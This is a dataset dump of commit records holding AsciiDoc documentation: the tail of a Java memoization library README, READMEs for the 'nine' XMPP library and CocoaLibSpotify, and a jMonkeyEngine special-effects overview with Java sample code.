link:{jdk-api}\/java\/util\/function\/ToLongFunction.html[ToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n|===\n\n\n== Development Status\n\nThe Caffeine, Guava, JCache and `ConcurrentMap` based implementations cover all functional interfaces from `java.util.function`. 
Take a look at the link:https:\/\/github.com\/sebhoss\/memoization.java\/issues[open tickets] for future ideas & ways to help out.\n\n== Usage\n\nMemoize any of the supported types by using the static factory methods supplied by:\n\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-caffeine\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-caffeine.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `CaffeineMemoize` if you want to use link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-guava\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-guava.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `GuavaMemoize` if you want to use link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-jcache\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-jcache.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `JCacheMemoize` if you want to use link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] (JSR107) caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-core\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-core.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `MapMemoize` if you want to use any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`] as cache.\n\n=== Default cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier);\n----\n\n=== Default cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier);\n----\n\n=== Custom cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nCache<INPUT, INPUT> cache = ...; \/\/ 
com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nCache<INPUT, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nCache<INPUT, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nMap<String, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, cache);\n----\n\n=== Custom cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nMap<KEY, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier, cache);\n----\n\nNote that `MapMemoize` does accept any `Map`, however copies the entries in the map to a new `ConcurrentHashMap` in case the provided `Map` is not a `ConcurrentMap` as well. 
This is done in order to ensure atomic `computeIfAbsent` behavior.\n\n=== Integration\n\nIn order to use this project, declare the following inside your POM:\n\n[source, xml, subs=\"attributes,verbatim\"]\n----\n<dependencies>\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-core<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n\n <!-- CAFFEINE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-caffeine<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.github.ben-manes.caffeine<\/groupId>\n <artifactId>caffeine<\/artifactId>\n <version>${version.caffeine}<\/version>\n <\/dependency>\n <!-- CAFFEINE ONLY -->\n\n <!-- GUAVA ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-guava<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.google.guava<\/groupId>\n <artifactId>guava<\/artifactId>\n <version>${version.guava}<\/version>\n <\/dependency>\n <!-- GUAVA ONLY -->\n\n <!-- JCACHE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-jcache<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>javax.cache<\/groupId>\n <artifactId>cache-api<\/artifactId>\n <version>${version.jcache}<\/version>\n <\/dependency>\n <!-- Add your JCache implementation here -->\n <dependency>\n <groupId>...<\/groupId>\n <artifactId>...<\/artifactId>\n <version>...<\/version>\n <\/dependency>\n <!-- JCACHE ONLY -->\n\n<\/dependencies>\n----\n\nReplace `${version.memoization}` with the pass:[<a href=\"https:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3Ade.xn--ho-hia.memoization\">latest release<\/a>]. This project follows the link:http:\/\/semver.org\/[semantic versioning guidelines].\nPopular JCache implementations are link:http:\/\/www.ehcache.org\/[Ehcache], link:http:\/\/commons.apache.org\/proper\/commons-jcs\/[Commons JCS], link:https:\/\/hazelcast.org\/[Hazelcast], link:http:\/\/infinispan.org\/[Infinispan], link:https:\/\/ignite.apache.org\/[Apache Ignite] and link:http:\/\/www.alachisoft.com\/tayzgrid\/[TayzGrid].\nUse link:https:\/\/github.com\/jhalterman\/expiringmap[ExpiringMap], link:https:\/\/github.com\/ben-manes\/concurrentlinkedhashmap[ConcurrentLinkedHashMap], link:https:\/\/github.com\/OpenHFT\/Chronicle-Map[Chronicle-Map], link:http:\/\/www.cacheonix.org\/[Cacheonix] or other `ConcurrentMap` implementations as alternatives to the default `ConcurrentHashMap` used in the `MapMemoize` factory. 
Caches like link:http:\/\/cache2k.org\/[cache2k] can be used together with both `JCacheMemoize` as a JSR-107 cache and `MapMemoize` by calling `cache.asMap()`.\n\n=== Compatibility\n\nThis project is compatible with the following Java versions:\n\n.Java compatibility\n|===\n| | 1.X.Y | 2.X.Y\n\n| Java 8\n| \u2713\n| \u2713\n|===\n\n== Alternatives\n\n* link:http:\/\/www.tek271.com\/software\/java\/memoizer[Tek271 Memoizer]\n* link:https:\/\/github.com\/kelvinguu\/gitmemoizer[GitMemoizer]\n* link:http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/html\/cache.html#cache-annotations-cacheable[Spring's `@Cacheable`]\n* link:https:\/\/github.com\/marmelo\/chili#memoize[Chili's `@Memoize`]\n* link:https:\/\/clojuredocs.org\/clojure.core\/memoize[Clojure's `(memoize f)`]\n* link:http:\/\/docs.groovy-lang.org\/latest\/html\/gapi\/groovy\/transform\/Memoized.html[Groovy's `@Memoized`]\n* link:https:\/\/github.com\/cb372\/scalacache#memoization-of-method-results[ScalaCache's `memoize`]\n* link:https:\/\/github.com\/aol\/cyclops\/tree\/master\/cyclops-javaslang#memoization-with-a-guava-cache[Cyclops' `Memoize`]\n* link:https:\/\/github.com\/pakoito\/RxMemoization[RxMemoization]\n* link:https:\/\/github.com\/jmorwick\/memoized[memoized]\n* link:https:\/\/github.com\/ggrandes\/memoizer[memoizer]\n* link:http:\/\/aspects.jcabi.com\/annotation-cacheable.html[jcabi's `@Cacheable`]\n* link:https:\/\/github.com\/strongh\/crache#memoization-client[crache]\n\n== License\n\nTo the extent possible under law, the author(s) have dedicated all copyright\nand related and neighboring rights to this software to the public domain\nworldwide. This software is distributed without any warranty.\n\nYou should have received a copy of the CC0 Public Domain Dedication along\nwith this software. If not, see http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/.\n\n== Mirrors\n\n* https:\/\/github.com\/sebhoss\/memoization.java\n* https:\/\/bitbucket.org\/sebhoss\/memoization.java\n* https:\/\/gitlab.com\/sebastian.hoss\/memoization.java\n* http:\/\/v2.pikacode.com\/sebhoss\/memoization.java\n* http:\/\/repo.or.cz\/memoization.java.git\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"2da19fd6825089fb845cd8f4bcfd91882d0478da","subject":"Updating README.asciidoc.","message":"Updating README.asciidoc.\n","repos":"skriptble\/nine","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"= 6+1+2+0 = nine\n\nNine is an XMPP 6120 library. It contains the components necessary to build an XMPP server or client.\nThe library is broken into several packages, each of which handles a specific piece\nof the 6120 specification's functionality. These include:\n\nStream:: The stream package is responsible for separating the underlying transport layers\n(TCP implemented here, BOSH implemented in link:http:\/\/github.com\/skriptble\/gabble[gabble])\nfrom the XMPP application logic (stanza handling).\nSASL:: Handles the SASL related functionality.\nNamespace:: Maps constants to XMPP namespaces. This helps in avoiding mistyping a namespace.\nJID:: Handles JID creation and validation.\nElement:: Handles element parsing, marshalling, and manipulation.\nElement\/Stanza:: Handles stanza specific transformation and manipulation.\nBind:: Handles stream negotiation binding.\n\n== Prototype\nUnder the cmd\/prototype directory is a prototype implementation of an RFC 6120\nXMPP server. 
It only handles stream negotiation; however, it can be expanded to handle\nother types of XMPP logic. The prototype requires a signed certificate and key to start up properly. A self-signed certificate works for this purpose.\n","old_contents":"= 6+1+2+0 = nine\n\nAn XMPP core library\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"71a7cf5178b6d0c2e6f0c1488b99f4e6570ad906","subject":"Update readme.","message":"Update readme.\n","repos":"spectralmind\/cocoalibspotify,spotify\/cocoalibspotify,andyvand\/cocoalibspotify,andyvand\/cocoalibspotify,CrowdTunes\/cocoalibspotify,andyvand\/cocoalibspotify,CrowdTunes\/cocoalibspotify,yingwang\/Fspot,spotify\/cocoalibspotify,spotify\/cocoalibspotify,yingwang\/Fspot,CrowdTunes\/cocoalibspotify,andyvand\/cocoalibspotify,spectralmind\/cocoalibspotify,CrowdTunes\/cocoalibspotify,orta\/cocoalibspotify,spectralmind\/cocoalibspotify,spotify\/cocoalibspotify,yingwang\/Fspot","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"CocoaLibSpotify\n===============\n\nCocoaLibSpotify is an Objective-C wrapper around our libspotify library. It provides easy access to libspotify's features in a friendly, KVC\/O compliant Objective-C wrapper.\n\n*IMPORTANT:* When checking out CocoaLibSpotify, please run a +git submodule update --init+ before trying to build the sample projects.\n\nBuilding - Mac OS X\n====================\n\nThe Xcode project was built in Xcode 4.0, but should also work fine in Xcode 3.2.x.\n\nCocoaLibSpotify requires libspotify.framework, which isn't included in the repository. The Xcode project includes a build step to download and unpack it from developer.spotify.com automatically. If this fails for some reason, download it manually from developer.spotify.com and unpack it into the project folder.\n\nThe built CocoaLibSpotify.framework contains libspotify.framework as a child framework. Sometimes, Xcode gives build errors complaining it can't find <libspotify\/api.h>. If you get this, manually add the directory libspotify.framework is in to your project's \"Framework Search Paths\" build setting. For example, if you're building the CocoaLibSpotify.framework project with your application then copying it into your bundle, you'd have this:\n\n`$CONFIGURATION_BUILD_DIR\/CocoaLibSpotify.framework\/Versions\/Frameworks`\n\nOtherwise, you'd point to the downloaded libspotify.framework manually, something like this:\n\n`..\/..\/libspotify-9.1.32-Darwin-universal`\n\nBuilding - iOS\n==============\n\nAt the moment, the easiest way to build CocoaLibSpotify on iOS is to include all of the files in the \"common\" directory in your project. When you need to use CocoaLibSpotify, include the following header file and you'll have everything you need imported:\n\n#import \"CocoaLibSpotify.h\"\n\nOf course, you need to include libspotify in your project too. Simply download the archives from http:\/\/developer.spotify.com\/ and include the library and api.h file in your project.\n\nDocumentation\n=============\n\nThe headers of CocoaLibSpotify are well documented, and we've provided an Xcode DocSet to provide documentation right in Xcode. With these and the sample projects, you should have everything you need to dive right in!\n\nContact\n=======\n\nIf you have any problems or find any bugs, see our GitHub page for known issues and discussion. Otherwise, we may be available in irc:\/\/irc.freenode.net\/spotify. 
","old_contents":"CocoaLibSpotify\n===============\n\nCocoaLibSpotify is an Objective-C wrapper around our libspotify library. It provides easy access to libspotify's features in a friendly, KVC\/O compliant Objective-C wrapper.\n\n*IMPORTANT:* When checking out CocoaLibSpotify, please run a +git submodule update --init+ before trying to build the sample projects.\n\nBuilding - Mac OS X\n====================\n\nThe Xcode project was built in Xcode 4.0, but should also work fine in Xcode 3.2.x.\n\nCocoaLibSpotify requires libspotify.framework, which isn't included in the repository. The Xcode project includes a build step to download and unpack it from developer.spotify.com automatically. If this fails for some reason, download it manually from developer.spotify.com and unpack it into the project folder.\n\nThe built CocoaLibSpotify.framework contains libspotify.framework as a child framework. Sometimes, Xcode gives build errors complaining it can't find <libspotify\/api.h>. If you get this, manually add the directory CocoaLibSpotify.framework is in to your project's \"Framework Search Paths\" build setting.\n\nBuilding - iOS\n==============\n\nAt the moment, the easiest way to build CocoaLibSpotify on iOS is to include all of the files in the \"common\" directory directory in your project. When you need to use CocoaLibSpotify, include the following header file and you'll have everything you need imported:\n\n#import \"CocoaLibSpotify.h\"\n\nOf course, you need to include libspotify in your project too. Simply download the archives from http:\/\/developer.spotify.com\/ and include the library and api.h file in your project.\n\nDocumentation\n=============\n\nThe headers of CocoaLibSpotify are well documented, and we've provided an Xcode DocSet to provide documentation right in Xcode. With these and the sample projects, you should have everything you need to dive right in!\n\nContact\n=======\n\nIf you have any problems or find any bugs, see our GitHub page for known issues and discussion. Otherwise, we may be available in irc:\/\/irc.freenode.net\/spotify. ","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c4f5112d4910c13d7e904093e83dcaaccb1ee0cb","subject":"center test","message":"center test\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/core\/pages\/effect\/effects_overview.adoc","new_file":"docs\/modules\/core\/pages\/effect\/effects_overview.adoc","new_contents":"= jME3 Special Effects Overview\n:revnumber: 2.1\n:revdate: 2020\/07\/22\n:keywords: documentation, effect, light, water\n:uri-jmonkeyengine: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/tree\/master\/\n:img-jmonkeyengine: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/raw\/master\/\n:uri-forum: https:\/\/hub.jmonkeyengine.org\/\n\n\n\njME3 supports several types of special effects: Post-Processor Filters, SceneProcessors, and Particle Emitters (also known as particle systems). This list contains screenshots and links to sample code that demonstrates how to add the effect to a scene.\n\n\n\n== Sample Code\n\n* There is one `com.jme3.effect.ParticleEmitter` class for all Particle Systems.\n* There is one `com.jme3.post.FilterPostProcessor` class and several `com.jme3.post.filters.` (all Filters have `Filter` in their names).\n* There are several `SceneProcessor` classes in various packages, including e.g. 
`com.jme3.shadow.` and `com.jme3.water.` (SceneProcessors have `Processor` or `Renderer` in their names).\n\n\n=== Particle Emitter\n\n[source,java]\n----\n\npublic class MyGame extends SimpleApplication {\n public void simpleInitApp() {\n ParticleEmitter pm = new ParticleEmitter(\"my particle effect\", Type.Triangle, 60);\n Material pmMat = new Material(assetManager, \"Common\/MatDefs\/Misc\/Particle.j3md\");\n pmMat.setTexture(\"Texture\", assetManager.loadTexture(\"Effects\/spark.png\"));\n pm.setMaterial(pmMat);\n pm.setImagesX(1);\n pm.setImagesY(1);\n rootNode.attachChild(pm); \/\/ attach one or more emitters to any node\n }\n}\n\n----\n\n\n=== Scene Processor\n\n[source,java]\n----\n\npublic class MyGame extends SimpleApplication {\n private BasicShadowRenderer bsr;\n\n public void simpleInitApp() {\n bsr = new BasicShadowRenderer(assetManager, 1024);\n bsr.setDirection(new Vector3f(.3f, -0.5f, -0.5f));\n viewPort.addProcessor(bsr); \/\/ add one or more SceneProcessors to the viewport\n }\n...\n}\n----\n\n\n\n=== Post-Processor Filter\n\n[source,java]\n----\n\npublic class MyGame extends SimpleApplication {\n private FilterPostProcessor fpp; \/\/ one FilterPostProcessor per app\n private SomeFilter sf; \/\/ one or more Filters per app\n\n public void simpleInitApp() {\n fpp = new FilterPostProcessor(assetManager);\n viewPort.addProcessor(fpp); \/\/ add one FilterPostProcessor to viewPort\n\n sf = new SomeFilter();\n fpp.addFilter(sf); \/\/ add one or more Filters to FilterPostProcessor\n }\n...\n}\n----\n\n\n\n== Water\n\n[.float-group]\n--\n[.center]\nimage:effect\/water-post.png[water-post.png,width=\"150\",height=\"100\"]\nimage:effect\/water.png[water.png,width=\"150\",height=\"100\"]\nimage:effect\/water-reflection-muddy.png[water-reflection-muddy.png,width=\"150\",height=\"100\"]\nimage:effect\/underwater2.jpg[underwater2.jpg,width=\"150\",height=\"100\"]\n--\nThe jMonkeyEngine xref:jme3\/advanced\/water.adoc[\"`SeaMonkey WaterFilter`\"] simulates ocean waves and foam, including cool underwater caustics. +\nUse the SimpleWaterProcessor (SceneProcessor) for small, limited bodies of water, such as puddles, drinking troughs, pools, fountains.\n\nSee also:\n\n* link:{uri-forum}t\/monkeys-at-the-beach\/15000[Rendering Water as Post-Process Effect] announcement with video.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestSceneWater.java[TestSceneWater.java] \u2013 SimpleWaterProcessor. (SceneProcessor)\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestSimpleWater.java[TestSimpleWater.java] \u2013 SimpleWaterProcessor. 
(SceneProcessor)\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestPostWater.java[TestPostWater.java] \u2013 WaterFilter.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/water\/TestPostWaterLake.java[TestPostWaterLake.java] \u2013 WaterFilter.\n\n\n== Environment Effects\n\n=== Depth of Field Blur\n\nimage:effect\/dof-blur.png[dof-blur.png,width=\"150\",height=\"100\"]\nimage:effect\/light-scattering-filter.png[light-scattering-filter.png,width=\"150\",height=\"100\"]\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestDepthOfField.java[TestDepthOfField.java] \u2013 DepthOfFieldFilter.\n\n\n=== Fog\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestFog.java[TestFog.java] \u2013 FogFilter.\n\n\n\n=== Light Scattering\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestLightScattering.java[TestLightScattering.java] \u2013 LightScatteringFilter.\n\n\n\n=== Vegetation\n\n* Contribution: xref:jme3\/contributions\/vegetationsystem\/grass.adoc[Grass System]\n* Contribution: {uri-forum}t\/generating-vegetation-paged-geometry-style\/18928[Trees (WIP)]\n\n\n\n== Light and Shadows\n\n\n\n=== Bloom and Glow\n\nimage:effect\/tanlglow1.png[tanlglow1.png,width=\"150\",height=\"100\"]\nimage:effect\/shadow-sponza-ssao.png[shadow-sponza-ssao.png,width=\"150\",height=\"100\"]\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestBloom.java[TestBloom.java]\n* More details: xref:jme3\/advanced\/bloom_and_glow.adoc[Bloom and Glow] \u2013 BloomFilter.\n\n\n\n=== Light\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestSimpleLighting.java[TestSimpleLighting.java] \u2013 DirectionalLight, PointLight.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestLightRadius.java[TestLightRadius.java] \u2013 DirectionalLight, PointLight.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestManyLights.java[TestManyLights.java] \u2013 .j3o scene.\n* More details: xref:jme3\/advanced\/light_and_shadow.adoc[Light and Shadow]\n\n\n\n=== Shadow\n\nimage:effect\/shadow.png[shadow.png,width=\"150\",height=\"100\"]\nimage:light\/light-sources.png[light-sources.png,width=\"150\",height=\"100\"]\n\n\/\/* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestShadow.java[TestShadow.java] \u2013 BasicShadowRenderer. 
(SceneProcessor)\n\/\/* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/light\/TestPssmShadow.java[TestPssmShadow.java] \u2013 PssmShadowRenderer (SceneProcessor), also known as Parallel-Split Shadow Mapping (PSSM).\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestSSAO.java[TestSSAO.java], link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestSSAO2.java[TestSSAO2.java] \u2013 SSAOFilter, also known as Screen-Space Ambient Occlusion shadows (SSAO).\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestTransparentSSAO.java[TestTransparentSSAO.java] \u2013 SSAOFilter, also known as Screen-Space Ambient Occlusion shadows (SSAO), plus transparency.\n* More details: xref:jme3\/advanced\/light_and_shadow.adoc[Light and Shadow]\n\n\n\n== Special: Glass, Metal, Dissolve, Toon\n\n\n\n=== Toon Effect\n\nimage:effect\/toon-dino.png[toon-dino.png,width=\"150\",height=\"100\"]\n\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestCartoonEdge.java[TestCartoonEdge.java] \u2013 CartoonEdgeFilter.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/post\/TestTransparentCartoonEdge.java[TestTransparentCartoonEdge.java] \u2013 CartoonEdgeFilter.\n\n\n\n=== Fade in \/ Fade out\n\n* xref:jme3\/advanced\/fade.adoc[Fade] \u2013 FadeFilter\n\n\n\n=== User Contributed\n\nimage:effect\/shaderblow_light1.jpg[shaderblow_light1.jpg,width=\"78\",height=\"150\"]\nimage:effect\/shaderblow_glass.jpg[shaderblow_glass.jpg,width=\"80\",height=\"150\"]\nimage:sdk:plugin\/shaderblow_matcap.jpg[shaderblow_matcap.jpg,width=\"150\",height=\"150\"]\nimage:effect\/shaderblow_light2.jpg[shaderblow_light2.jpg,width=\"66\",height=\"150\"]\n\nxref:sdk:plugin\/shaderblow.adoc[ShaderBlow - GLSL Shader Library]\n\n* LightBlow Shader \u2013 blend material texture maps.\n* FakeParticleBlow Shader \u2013 jet, fire effect.\n* ToonBlow Shader \u2013 Toon Shading, toon edges.\n* Dissolve Shader \u2013 Scifi teleportation\/dissolve effect.\n* MatCap Shader \u2013 Gold, metals, glass, toons\u2026!\n* Glass Shader \u2013 Glass.\n* Force Shield Shader \u2013 Scifi impact-on-force-field effect.\n* SimpleSprite Shader \u2013 Animated textures.\n* SimpleSpriteParticle Shader \u2013 Sprite library.\n* MovingTexture Shader \u2013 Animated cloud\/mist texture.\n* SoftParticles Shader \u2013 Fire, clouds, smoke etc.\n* Displace Shader \u2013 Deformation effect: Ripple, wave, pulse, swell!\n\nThanks for your awesome contributions! Keep them coming!\n\n\n\n== Particle Emitters: Explosions, Fire, Smoke\n\nimage:effect\/explosion-5.png[explosion-5.png,width=\"150\",height=\"100\"]\nimage:effect\/particle.png[particle.png,width=\"150\",height=\"100\"]\n\nxref:jme3\/advanced\/particle_emitters.adoc[Particle emitter effects] are highly configurable and can have any texture. They can simulate smoke, dust, leaves, meteors, snowflakes, mosquitos, fire, explosions, clusters, embers, sparks\u2026\n\n
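As a rough illustration of that configurability, this sketch extends the minimal emitter from the Sample Code section with colour, size, lifetime and velocity settings. It is a hand-written example, not taken from the engine sources, and the flame texture path assumes the jme3-test-data assets:\n\n[source,java]\n----\nParticleEmitter fire = new ParticleEmitter(\"fire\", ParticleMesh.Type.Triangle, 30);\nMaterial flameMat = new Material(assetManager, \"Common\/MatDefs\/Misc\/Particle.j3md\");\nflameMat.setTexture(\"Texture\", assetManager.loadTexture(\"Effects\/Explosion\/flame.png\")); \/\/ assumed test-data asset\nfire.setMaterial(flameMat);\nfire.setImagesX(2); \/\/ columns in the sprite sheet\nfire.setImagesY(2); \/\/ rows in the sprite sheet\nfire.setStartColor(new ColorRGBA(1f, 1f, 0f, 1f)); \/\/ bright yellow core\nfire.setEndColor(new ColorRGBA(1f, 0f, 0f, 0.5f)); \/\/ fades towards translucent red\nfire.setStartSize(1.5f);\nfire.setEndSize(0.1f);\nfire.setGravity(0f, 0f, 0f); \/\/ no gravity, particles drift with their velocity\nfire.setLowLife(1f); \/\/ shortest particle lifetime in seconds\nfire.setHighLife(3f); \/\/ longest particle lifetime in seconds\nfire.getParticleInfluencer().setInitialVelocity(new Vector3f(0f, 2f, 0f));\nfire.getParticleInfluencer().setVelocityVariation(0.3f);\nrootNode.attachChild(fire);\n----\n\nThe bundled examples below demonstrate more elaborate effects:\n\n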
* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/effect\/TestExplosionEffect.java[TestExplosionEffect.java] \u2013 debris, flame, flash, shockwave, smoke, sparks.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/effect\/TestPointSprite.java[TestPointSprite.java] \u2013 cluster of points.\n* link:{uri-jmonkeyengine}jme3-examples\/src\/main\/java\/jme3test\/effect\/TestMovingParticle.java[TestMovingParticle.java] \u2013 dust, smoke.\n\n\n=== Creating your own Filters\n\nHere is an extract taken from @nehon in the forum thread (link:{uri-forum}t\/how-exactly-do-filters-work\/26871[http:\/\/hub.jmonkeyengine.org\/forum\/topic\/how-exactly-do-filters-work\/]).\n\nThe methods are called in this order (pretty much the same flow as processors):\n- initFilter() is called once when the FilterPostProcessor is initialized, or when the filter is added to the processor and the processor has already been initialized.\n\nFor each frame, the methods are called in this sequence:\n- preFrame() occurs before anything happens\n- postQueue() occurs once the queues have been populated (there is one queue per bucket and 2 additional queues for the shadows, casters and receivers). Note that geometries in the queues are the ones in the view frustum.\n- postFrame() occurs once the main frame has been rendered (the back buffer)\n\nThose methods are optional in a filter; they are only there if you want to hook into the rendering process.\n\nThe material variable is here for convenience. You have a getMaterial method that returns the material that\u2019s gonna be used to render the full screen quad. It just happened that in every implementation I had a material attribute in all my sub-classes, so I just put it back in the abstract class. Most of the time getMaterial returns this attribute.\n\nForced-technique can be any technique really; they are more related to the material system than to the filters. When you use a forced technique the renderer tries to select it on the material of each geometry; if the technique does not exist for the material, the geometry is not rendered.\nYou assume correctly about the SSAO filter: the normals of the scene are rendered to a texture in a pre pass.\n\nPasses: these are filters in filters in a way. First they are a convenient way to initialize a FrameBuffer and the associated textures it needs, then you can use them for whatever you want.\nFor example, a Pass can be (as in the SSAO filter) an extra render of the scene with a forced technique, and you have to handle the render yourself in the postQueue method.\nIt can be a post pass to do after the main filter has been rendered to screen (for example an additional blur pass used in SSAO again). You have a list of passes called postRenderPass in the Filter abstract class. 
